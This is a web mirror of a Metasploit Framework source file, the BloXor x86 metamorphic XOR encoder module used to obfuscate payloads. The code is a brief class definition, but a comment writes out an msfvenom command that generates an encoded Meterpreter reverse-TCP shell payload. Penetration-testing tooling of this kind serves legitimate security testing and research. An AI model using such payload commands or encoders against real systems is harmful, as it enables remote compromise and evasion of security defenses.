CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/encoders/x86/bloxor.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'rex/encoder/bloxor/bloxor'

7


8
#

9
# BloXor is a cross architecture metamorphic block based xor encoder/decoder for Metasploit.

10
# BloXor was inspired by the Shikata Ga Nai encoder (./msf/modules/encoders/x86/shikata_ga_nai.rb)

11
# by spoonm and the Rex::Poly::Block (./msf/lib/rex/poly/block.rb) code by skape.

12
#

13
# Please refer to ./msf/lib/rex/encoder/bloxor/bloxor.rb for BloXor's implementation and to

14
# ./msf/lib/rex/poly/machine/machine.rb and ./msf/lib/rex/poly/machine/x86.rb for the

15
# backend metamorphic stuff.

16
#

17
# A presentation at AthCon 2012 by Dimitrios A. Glynos called 'Packing Heat!' discusses a

18
# metamorphic packer for PE executables and also uses METASM.  I am unaware of any code having

19
# been publicly released for this, so am unable to compare implementations.

20
# http://census-labs.com/media/packing-heat.pdf

21
#

22
# Manually check the output with the following command:

23
# >ruby msfvenom -p windows/meterpreter/reverse_tcp RHOST=192.168.2.2 LHOST=192.168.2.1 LPORT=80 -a x86 -e x86/bloxor -b '\x00' -f raw | ndisasm -b32 -k 128,1 -

24
#

25


26
class MetasploitModule < Rex::Encoder::BloXor

27


28
  # Note: Currently set to manual, bump it up to automatically get selected by the framework.

29
  # Note: BloXor by design is slow due to its exhaustive search for a solution.

30
  Rank = ManualRanking

31


32
  def initialize

33
    super(

34
      'Name'        => 'BloXor - A Metamorphic Block Based XOR Encoder',

35
      'Description' => 'A Metamorphic Block Based XOR Encoder.',

36
      'Author'      => [ 'sf' ],

37
      'Arch'        => ARCH_X86,

38
      'License'     => MSF_LICENSE,

39
      'EncoderType' => Msf::Encoder::Type::Unspecified

40
      )

41
  end

42


43
  def compute_decoder( state )

44


45
    @machine = Rex::Poly::MachineX86.new( state.badchars )

46


47
    super( state )

48
  end

49
end

50


51